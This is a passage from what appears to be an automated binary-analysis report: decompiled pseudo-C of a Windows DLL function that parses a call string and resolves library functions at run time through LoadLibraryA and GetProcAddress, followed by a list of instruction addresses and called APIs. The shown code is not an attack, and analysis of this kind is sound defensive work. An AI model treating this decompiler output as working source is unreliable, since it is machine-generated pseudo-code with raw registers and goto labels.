                                                                                                                                                                                                          											_v52 = _v52 + 1;
                                                                                                                                                                                                          											_push(3);
                                                                                                                                                                                                          											_pop(__ecx);
                                                                                                                                                                                                          											goto L91;
                                                                                                                                                                                                          										case 0x21:
                                                                                                                                                                                                          											L120:
                                                                                                                                                                                                          											_push(4);
                                                                                                                                                                                                          											L123:
                                                                                                                                                                                                          											_pop(__ecx);
                                                                                                                                                                                                          											L91:
                                                                                                                                                                                                          											__edi = _v16;
                                                                                                                                                                                                          											__edx =  *(0x72e3305c + __ecx * 4);
                                                                                                                                                                                                          											__eax =  ~__eax;
                                                                                                                                                                                                          											asm("sbb eax, eax");
                                                                                                                                                                                                          											_v40 = 1;
                                                                                                                                                                                                          											__edi = _v16 << 5;
                                                                                                                                                                                                          											__eax = __eax & 0x00008000;
                                                                                                                                                                                                          											__edi = (_v16 << 5) + __esi;
                                                                                                                                                                                                          											__eax = __eax | __ecx;
                                                                                                                                                                                                          											__eflags = _v8;
                                                                                                                                                                                                          											 *(__edi + 0x818) = __eax;
                                                                                                                                                                                                          											if(_v8 < 0) {
                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                          												__edx = 0;
                                                                                                                                                                                                          												__edx = 1;
                                                                                                                                                                                                          												__eflags = 1;
                                                                                                                                                                                                          												L94:
                                                                                                                                                                                                          												__eflags = _v8 - 1;
                                                                                                                                                                                                          												 *(__edi + 0x828) = __edx;
                                                                                                                                                                                                          												if(_v8 == 1) {
                                                                                                                                                                                                          													__eax =  &_v12;
                                                                                                                                                                                                          													__eax = E72E31A36( &_v12);
                                                                                                                                                                                                          													__eax = __eax + 1;
                                                                                                                                                                                                          													__eflags = __eax;
                                                                                                                                                                                                          													_v8 = __eax;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eax = _v8;
                                                                                                                                                                                                          												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                                                                                                                                                                          												_t136 = _v16 + 0x41; // 0x41
                                                                                                                                                                                                          												_t136 = _t136 << 5;
                                                                                                                                                                                                          												__eax = 0;
                                                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                                                          												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                                                                                                                                          												 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                                                                                                                                                                          												 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                                                                                                                                                                          												L97:
                                                                                                                                                                                                          												__eflags = __ebx;
                                                                                                                                                                                                          												if(__ebx == 0) {
                                                                                                                                                                                                          													goto L57;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L98:
                                                                                                                                                                                                          												__eflags = _v20;
                                                                                                                                                                                                          												_v40 = 1;
                                                                                                                                                                                                          												if(_v20 != 0) {
                                                                                                                                                                                                          													L103:
                                                                                                                                                                                                          													__eflags = _v20 - 1;
                                                                                                                                                                                                          													if(_v20 == 1) {
                                                                                                                                                                                                          														__eax = _v16;
                                                                                                                                                                                                          														__eax = _v16 << 5;
                                                                                                                                                                                                          														__eflags = __eax;
                                                                                                                                                                                                          														 *(__eax + __esi + 0x82c) = __ebx;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L105;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_v16 = _v16 << 5;
                                                                                                                                                                                                          												_t144 = __esi + 0x830; // 0x830
                                                                                                                                                                                                          												__edi = (_v16 << 5) + _t144;
                                                                                                                                                                                                          												__eax =  *__edi;
                                                                                                                                                                                                          												__eflags = __eax - 0xffffffff;
                                                                                                                                                                                                          												if(__eax <= 0xffffffff) {
                                                                                                                                                                                                          													L101:
                                                                                                                                                                                                          													__eax = GlobalFree(__eax);
                                                                                                                                                                                                          													L102:
                                                                                                                                                                                                          													 *__edi = __ebx;
                                                                                                                                                                                                          													goto L103;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = __eax - 0x19;
                                                                                                                                                                                                          												if(__eax <= 0x19) {
                                                                                                                                                                                                          													goto L102;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L101;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = __edx;
                                                                                                                                                                                                          											if(__edx > 0) {
                                                                                                                                                                                                          												goto L94;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L93;
                                                                                                                                                                                                          										case 0x22:
                                                                                                                                                                                                          											goto L57;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t271 = _t268 - 1;
                                                                                                                                                                                                          								__eflags = _t271;
                                                                                                                                                                                                          								if(_t271 == 0) {
                                                                                                                                                                                                          									_v16 = _t282;
                                                                                                                                                                                                          									goto L80;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t271 != 1;
                                                                                                                                                                                                          								if(_t271 != 1) {
                                                                                                                                                                                                          									goto L162;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t285 - 0x6e;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									_t308 = _t285 - 0x72;
                                                                                                                                                                                                          									__eflags = _t308;
                                                                                                                                                                                                          									if(_t308 == 0) {
                                                                                                                                                                                                          										_push(4);
                                                                                                                                                                                                          										L74:
                                                                                                                                                                                                          										_pop(_t273);
                                                                                                                                                                                                          										L75:
                                                                                                                                                                                                          										__eflags = _v8 - 1;
                                                                                                                                                                                                          										if(_v8 != 1) {
                                                                                                                                                                                                          											_t96 = _t329 + 0x810;
                                                                                                                                                                                                          											 *_t96 =  *(_t329 + 0x810) &  !_t273;
                                                                                                                                                                                                          											__eflags =  *_t96;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v8 = 1;
                                                                                                                                                                                                          										goto L57;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t311 = _t308 - 1;
                                                                                                                                                                                                          									__eflags = _t311;
                                                                                                                                                                                                          									if(_t311 == 0) {
                                                                                                                                                                                                          										_push(0x10);
                                                                                                                                                                                                          										goto L74;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t311 != 0;
                                                                                                                                                                                                          									if(_t311 != 0) {
                                                                                                                                                                                                          										goto L57;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_push(0x40);
                                                                                                                                                                                                          									goto L74;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                          									goto L74;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t314 = _t285 - 0x21;
                                                                                                                                                                                                          								__eflags = _t314;
                                                                                                                                                                                                          								if(_t314 == 0) {
                                                                                                                                                                                                          									_v8 =  ~_v8;
                                                                                                                                                                                                          									goto L57;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t315 = _t314 - 0x11;
                                                                                                                                                                                                          								__eflags = _t315;
                                                                                                                                                                                                          								if(_t315 == 0) {
                                                                                                                                                                                                          									_t273 = 0x100;
                                                                                                                                                                                                          									goto L75;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t316 = _t315 - 0x31;
                                                                                                                                                                                                          								__eflags = _t316;
                                                                                                                                                                                                          								if(_t316 == 0) {
                                                                                                                                                                                                          									_t273 = 1;
                                                                                                                                                                                                          									goto L75;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t316 != 0;
                                                                                                                                                                                                          								if(_t316 != 0) {
                                                                                                                                                                                                          									goto L57;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_push(0x20);
                                                                                                                                                                                                          								goto L74;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_v32 = _t282;
                                                                                                                                                                                                          								_v36 = _t282;
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
                                                                                                                                                                                                          						if( *((char*)(_t320 - 1)) != 0x3a) {
                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _v32 - _t282;
                                                                                                                                                                                                          						if(_v32 == _t282) {
                                                                                                                                                                                                          							goto L43;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t276 = _t257 - 5;
                                                                                                                                                                                                          					if(_t276 == 0) {
                                                                                                                                                                                                          						__eflags = _v44 - _t282;
                                                                                                                                                                                                          						if(_v44 != _t282) {
                                                                                                                                                                                                          							goto L43;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							__eflags = _v36 - 3;
                                                                                                                                                                                                          							_v32 = 1;
                                                                                                                                                                                                          							_v8 = _t282;
                                                                                                                                                                                                          							_v20 = _t282;
                                                                                                                                                                                                          							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                                                                                                                          							_v40 = _t282;
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t280 = _t276 - 1;
                                                                                                                                                                                                          					if(_t280 == 0) {
                                                                                                                                                                                                          						__eflags = _v44 - _t282;
                                                                                                                                                                                                          						if(_v44 != _t282) {
                                                                                                                                                                                                          							goto L43;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v32 = 2;
                                                                                                                                                                                                          							_v8 = _t282;
                                                                                                                                                                                                          							_v20 = _t282;
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t280 != 0x16) {
                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_v32 = 3;
                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				GlobalFree(_v56);
                                                                                                                                                                                                          				GlobalFree(_v24);
                                                                                                                                                                                                          				GlobalFree(_v48);
                                                                                                                                                                                                          				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
                                                                                                                                                                                                          					L182:
                                                                                                                                                                                                          					return _t329;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t224 =  *_t329 - 1;
                                                                                                                                                                                                          					if(_t224 == 0) {
                                                                                                                                                                                                          						_t187 = _t329 + 8; // 0x8
                                                                                                                                                                                                          						_t323 = _t187;
                                                                                                                                                                                                          						__eflags =  *_t323;
                                                                                                                                                                                                          						if( *_t323 != 0) {
                                                                                                                                                                                                          							_t225 = GetModuleHandleA(_t323); // executed
                                                                                                                                                                                                          							__eflags = _t225 - _t282;
                                                                                                                                                                                                          							 *(_t329 + 0x808) = _t225;
                                                                                                                                                                                                          							if(_t225 != _t282) {
                                                                                                                                                                                                          								L171:
                                                                                                                                                                                                          								_t192 = _t329 + 0x408; // 0x408
                                                                                                                                                                                                          								_t324 = _t192;
                                                                                                                                                                                                          								_t226 = E72E315C2( *(_t329 + 0x808), _t324);
                                                                                                                                                                                                          								__eflags = _t226 - _t282;
                                                                                                                                                                                                          								 *(_t329 + 0x80c) = _t226;
                                                                                                                                                                                                          								if(_t226 == _t282) {
                                                                                                                                                                                                          									__eflags =  *_t324 - 0x23;
                                                                                                                                                                                                          									if( *_t324 == 0x23) {
                                                                                                                                                                                                          										_t195 = _t329 + 0x409; // 0x409
                                                                                                                                                                                                          										_t230 = E72E312FE(_t195);
                                                                                                                                                                                                          										__eflags = _t230 - _t282;
                                                                                                                                                                                                          										if(_t230 != _t282) {
                                                                                                                                                                                                          											__eflags = _t230 & 0xffff0000;
                                                                                                                                                                                                          											if((_t230 & 0xffff0000) == 0) {
                                                                                                                                                                                                          												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _v52 - _t282;
                                                                                                                                                                                                          								if(_v52 != _t282) {
                                                                                                                                                                                                          									L178:
                                                                                                                                                                                                          									_t324[lstrlenA(_t324)] = 0x41;
                                                                                                                                                                                                          									_t228 = E72E315C2( *(_t329 + 0x808), _t324);
                                                                                                                                                                                                          									__eflags = _t228 - _t282;
                                                                                                                                                                                                          									if(_t228 != _t282) {
                                                                                                                                                                                                          										L166:
                                                                                                                                                                                                          										 *(_t329 + 0x80c) = _t228;
                                                                                                                                                                                                          										goto L182;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                                                                                                                                          									L180:
                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                          										goto L182;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									L181:
                                                                                                                                                                                                          									_t205 = _t329 + 4;
                                                                                                                                                                                                          									 *_t205 =  *(_t329 + 4) | 0xffffffff;
                                                                                                                                                                                                          									__eflags =  *_t205;
                                                                                                                                                                                                          									goto L182;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                                                                                                                                          									if( *(_t329 + 0x80c) != _t282) {
                                                                                                                                                                                                          										goto L182;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L178;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t233 = LoadLibraryA(_t323); // executed
                                                                                                                                                                                                          							__eflags = _t233 - _t282;
                                                                                                                                                                                                          							 *(_t329 + 0x808) = _t233;
                                                                                                                                                                                                          							if(_t233 == _t282) {
                                                                                                                                                                                                          								goto L181;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L171;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t188 = _t329 + 0x408; // 0x408
                                                                                                                                                                                                          						_t235 = E72E312FE(_t188);
                                                                                                                                                                                                          						 *(_t329 + 0x80c) = _t235;
                                                                                                                                                                                                          						__eflags = _t235 - _t282;
                                                                                                                                                                                                          						goto L180;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t236 = _t224 - 1;
                                                                                                                                                                                                          					if(_t236 == 0) {
                                                                                                                                                                                                          						_t185 = _t329 + 0x408; // 0x408
                                                                                                                                                                                                          						_t237 = _t185;
                                                                                                                                                                                                          						__eflags =  *_t237;
                                                                                                                                                                                                          						if( *_t237 == 0) {
                                                                                                                                                                                                          							goto L182;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t228 = E72E312FE(_t237);
                                                                                                                                                                                                          						L165:
                                                                                                                                                                                                          						goto L166;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t236 != 1) {
                                                                                                                                                                                                          						goto L182;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t81 = _t329 + 8; // 0x8
                                                                                                                                                                                                          					_t283 = _t81;
                                                                                                                                                                                                          					_t325 = E72E312FE(_t81);
                                                                                                                                                                                                          					 *(_t329 + 0x808) = _t325;
                                                                                                                                                                                                          					if(_t325 == 0) {
                                                                                                                                                                                                          						goto L181;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t329 + 0x850)) = E72E31224(_t283);
                                                                                                                                                                                                          					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t329 + 0x848)) = 1;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t329 + 0x838)) = 1;
                                                                                                                                                                                                          					_t90 = _t329 + 0x408; // 0x408
                                                                                                                                                                                                          					_t228 =  *(_t325->i + E72E312FE(_t90) * 4);
                                                                                                                                                                                                          					goto L165;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



































































                                                                                                                                                                                                          0x72e31c76
                                                                                                                                                                                                          0x72e31c76
                                                                                                                                                                                                          0x72e31c78
                                                                                                                                                                                                          0x72e31c64
                                                                                                                                                                                                          0x72e31c6a
                                                                                                                                                                                                          0x72e31c6d
                                                                                                                                                                                                          0x72e31c6d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31bff
                                                                                                                                                                                                          0x72e31bff
                                                                                                                                                                                                          0x72e31bff
                                                                                                                                                                                                          0x72e31c00
                                                                                                                                                                                                          0x72e31c08
                                                                                                                                                                                                          0x72e31c0c
                                                                                                                                                                                                          0x72e31c12
                                                                                                                                                                                                          0x72e31c16
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31c16
                                                                                                                                                                                                          0x72e31c02
                                                                                                                                                                                                          0x72e31c02
                                                                                                                                                                                                          0x72e31c03
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31c05
                                                                                                                                                                                                          0x72e31c06
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31c06
                                                                                                                                                                                                          0x72e31b96
                                                                                                                                                                                                          0x72e31b97
                                                                                                                                                                                                          0x72e31ba0
                                                                                                                                                                                                          0x72e31ba3
                                                                                                                                                                                                          0x72e31bb0
                                                                                                                                                                                                          0x72e31bb0
                                                                                                                                                                                                          0x72e31ba5
                                                                                                                                                                                                          0x72e31ba5
                                                                                                                                                                                                          0x72e31c7e
                                                                                                                                                                                                          0x72e31c81
                                                                                                                                                                                                          0x72e31c84
                                                                                                                                                                                                          0x72e31cf6
                                                                                                                                                                                                          0x72e31cfa
                                                                                                                                                                                                          0x72e31adc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31adc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31cfa
                                                                                                                                                                                                          0x72e31b94
                                                                                                                                                                                                          0x72e31b00
                                                                                                                                                                                                          0x72e31b03
                                                                                                                                                                                                          0x72e31b66
                                                                                                                                                                                                          0x72e31b69
                                                                                                                                                                                                          0x72e31b7a
                                                                                                                                                                                                          0x72e31b7a
                                                                                                                                                                                                          0x72e31b7d
                                                                                                                                                                                                          0x72e31c89
                                                                                                                                                                                                          0x72e31c8c
                                                                                                                                                                                                          0x72e31c8c
                                                                                                                                                                                                          0x72e31c8e
                                                                                                                                                                                                          0x72e32033
                                                                                                                                                                                                          0x72e32045
                                                                                                                                                                                                          0x72e32045
                                                                                                                                                                                                          0x72e32047
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32037
                                                                                                                                                                                                          0x72e32038
                                                                                                                                                                                                          0x72e3203b
                                                                                                                                                                                                          0x72e3203e
                                                                                                                                                                                                          0x72e320ba
                                                                                                                                                                                                          0x72e320c1
                                                                                                                                                                                                          0x72e320c6
                                                                                                                                                                                                          0x72e320c9
                                                                                                                                                                                                          0x72e31cf2
                                                                                                                                                                                                          0x72e31cf2
                                                                                                                                                                                                          0x72e31cf2
                                                                                                                                                                                                          0x72e31cf3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31cf3
                                                                                                                                                                                                          0x72e32040
                                                                                                                                                                                                          0x72e32042
                                                                                                                                                                                                          0x72e32042
                                                                                                                                                                                                          0x72e32049
                                                                                                                                                                                                          0x72e3204b
                                                                                                                                                                                                          0x72e320ae
                                                                                                                                                                                                          0x72e31ce7
                                                                                                                                                                                                          0x72e31cea
                                                                                                                                                                                                          0x72e31ced
                                                                                                                                                                                                          0x72e31cf0
                                                                                                                                                                                                          0x72e31cf0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31cf0
                                                                                                                                                                                                          0x72e3204d
                                                                                                                                                                                                          0x72e3204f
                                                                                                                                                                                                          0x72e32055
                                                                                                                                                                                                          0x72e32055
                                                                                                                                                                                                          0x72e32057
                                                                                                                                                                                                          0x72e3205a
                                                                                                                                                                                                          0x72e3206d
                                                                                                                                                                                                          0x72e3206d
                                                                                                                                                                                                          0x72e32070
                                                                                                                                                                                                          0x72e32073
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32075
                                                                                                                                                                                                          0x72e32078
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3207a
                                                                                                                                                                                                          0x72e32081
                                                                                                                                                                                                          0x72e32081
                                                                                                                                                                                                          0x72e32087
                                                                                                                                                                                                          0x72e3208a
                                                                                                                                                                                                          0x72e320a6
                                                                                                                                                                                                          0x72e3208c
                                                                                                                                                                                                          0x72e32095
                                                                                                                                                                                                          0x72e32098
                                                                                                                                                                                                          0x72e32098
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3208a
                                                                                                                                                                                                          0x72e3205c
                                                                                                                                                                                                          0x72e3205f
                                                                                                                                                                                                          0x72e32062
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32064
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32064
                                                                                                                                                                                                          0x72e32051
                                                                                                                                                                                                          0x72e32053
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31e23
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f20
                                                                                                                                                                                                          0x72e31f20
                                                                                                                                                                                                          0x72e31f22
                                                                                                                                                                                                          0x72e31f29
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f67
                                                                                                                                                                                                          0x72e31f67
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f32
                                                                                                                                                                                                          0x72e31f32
                                                                                                                                                                                                          0x72e31f34
                                                                                                                                                                                                          0x72e31f3b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f44
                                                                                                                                                                                                          0x72e31f44
                                                                                                                                                                                                          0x72e31f46
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f75
                                                                                                                                                                                                          0x72e31f75
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f4f
                                                                                                                                                                                                          0x72e31f4f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f9b
                                                                                                                                                                                                          0x72e31f9f
                                                                                                                                                                                                          0x72e31fa4
                                                                                                                                                                                                          0x72e31fa7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f59
                                                                                                                                                                                                          0x72e31f59
                                                                                                                                                                                                          0x72e31f5c
                                                                                                                                                                                                          0x72e31f5e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f6e
                                                                                                                                                                                                          0x72e31f6e
                                                                                                                                                                                                          0x72e31f77
                                                                                                                                                                                                          0x72e31f77
                                                                                                                                                                                                          0x72e31e5a
                                                                                                                                                                                                          0x72e31e5a
                                                                                                                                                                                                          0x72e31e5d
                                                                                                                                                                                                          0x72e31e64
                                                                                                                                                                                                          0x72e31e66
                                                                                                                                                                                                          0x72e31e68
                                                                                                                                                                                                          0x72e31e6f
                                                                                                                                                                                                          0x72e31e72
                                                                                                                                                                                                          0x72e31e77
                                                                                                                                                                                                          0x72e31e79
                                                                                                                                                                                                          0x72e31e7b
                                                                                                                                                                                                          0x72e31e7f
                                                                                                                                                                                                          0x72e31e85
                                                                                                                                                                                                          0x72e31e8b
                                                                                                                                                                                                          0x72e31e8b
                                                                                                                                                                                                          0x72e31e8d
                                                                                                                                                                                                          0x72e31e8d
                                                                                                                                                                                                          0x72e31e8e
                                                                                                                                                                                                          0x72e31e8e
                                                                                                                                                                                                          0x72e31e92
                                                                                                                                                                                                          0x72e31e98
                                                                                                                                                                                                          0x72e31e9a
                                                                                                                                                                                                          0x72e31e9e
                                                                                                                                                                                                          0x72e31ea3
                                                                                                                                                                                                          0x72e31ea3
                                                                                                                                                                                                          0x72e31ea5
                                                                                                                                                                                                          0x72e31ea5
                                                                                                                                                                                                          0x72e31ea8
                                                                                                                                                                                                          0x72e31eab
                                                                                                                                                                                                          0x72e31eb4
                                                                                                                                                                                                          0x72e31eb7
                                                                                                                                                                                                          0x72e31eba
                                                                                                                                                                                                          0x72e31eba
                                                                                                                                                                                                          0x72e31ebc
                                                                                                                                                                                                          0x72e31ebf
                                                                                                                                                                                                          0x72e31ec5
                                                                                                                                                                                                          0x72e31ecb
                                                                                                                                                                                                          0x72e31ecb
                                                                                                                                                                                                          0x72e31ecd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31ed3
                                                                                                                                                                                                          0x72e31ed3
                                                                                                                                                                                                          0x72e31ed7
                                                                                                                                                                                                          0x72e31ede
                                                                                                                                                                                                          0x72e31f02
                                                                                                                                                                                                          0x72e31f02
                                                                                                                                                                                                          0x72e31f06
                                                                                                                                                                                                          0x72e31f08
                                                                                                                                                                                                          0x72e31f0b
                                                                                                                                                                                                          0x72e31f0b
                                                                                                                                                                                                          0x72e31f0e
                                                                                                                                                                                                          0x72e31f0e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f06
                                                                                                                                                                                                          0x72e31ee3
                                                                                                                                                                                                          0x72e31ee6
                                                                                                                                                                                                          0x72e31ee6
                                                                                                                                                                                                          0x72e31eed
                                                                                                                                                                                                          0x72e31eef
                                                                                                                                                                                                          0x72e31ef2
                                                                                                                                                                                                          0x72e31ef9
                                                                                                                                                                                                          0x72e31efa
                                                                                                                                                                                                          0x72e31f00
                                                                                                                                                                                                          0x72e31f00
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31f00
                                                                                                                                                                                                          0x72e31ef4
                                                                                                                                                                                                          0x72e31ef7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31ef7
                                                                                                                                                                                                          0x72e31e87
                                                                                                                                                                                                          0x72e31e89
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31df5
                                                                                                                                                                                                          0x72e31c9b
                                                                                                                                                                                                          0x72e321c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x72e321c2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3218f
                                                                                                                                                                                                          0x72e3218f
                                                                                                                                                                                                          0x72e32195
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32195
                                                                                                                                                                                                          0x72e3218d
                                                                                                                                                                                                          0x72e32125
                                                                                                                                                                                                          0x72e3212b
                                                                                                                                                                                                          0x72e3212d
                                                                                                                                                                                                          0x72e32133
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32133
                                                                                                                                                                                                          0x72e320f9
                                                                                                                                                                                                          0x72e32100
                                                                                                                                                                                                          0x72e32106
                                                                                                                                                                                                          0x72e3210c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3210c
                                                                                                                                                                                                          0x72e31d32
                                                                                                                                                                                                          0x72e31d33
                                                                                                                                                                                                          0x72e320d0
                                                                                                                                                                                                          0x72e320d0
                                                                                                                                                                                                          0x72e320d6
                                                                                                                                                                                                          0x72e320d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e320e0
                                                                                                                                                                                                          0x72e320e5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e320e5
                                                                                                                                                                                                          0x72e31d3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31d40
                                                                                                                                                                                                          0x72e31d40
                                                                                                                                                                                                          0x72e31d49
                                                                                                                                                                                                          0x72e31d4e
                                                                                                                                                                                                          0x72e31d54
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31d5a
                                                                                                                                                                                                          0x72e31d67
                                                                                                                                                                                                          0x72e31d6d
                                                                                                                                                                                                          0x72e31d77
                                                                                                                                                                                                          0x72e31d7d
                                                                                                                                                                                                          0x72e31d85
                                                                                                                                                                                                          0x72e31d95
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e31d95

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 72E31215: GlobalAlloc.KERNEL32(00000040,72E31233,?,72E312CF,-72E3404B,72E311AB,-000000A0), ref: 72E3121D
                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72E31BC4
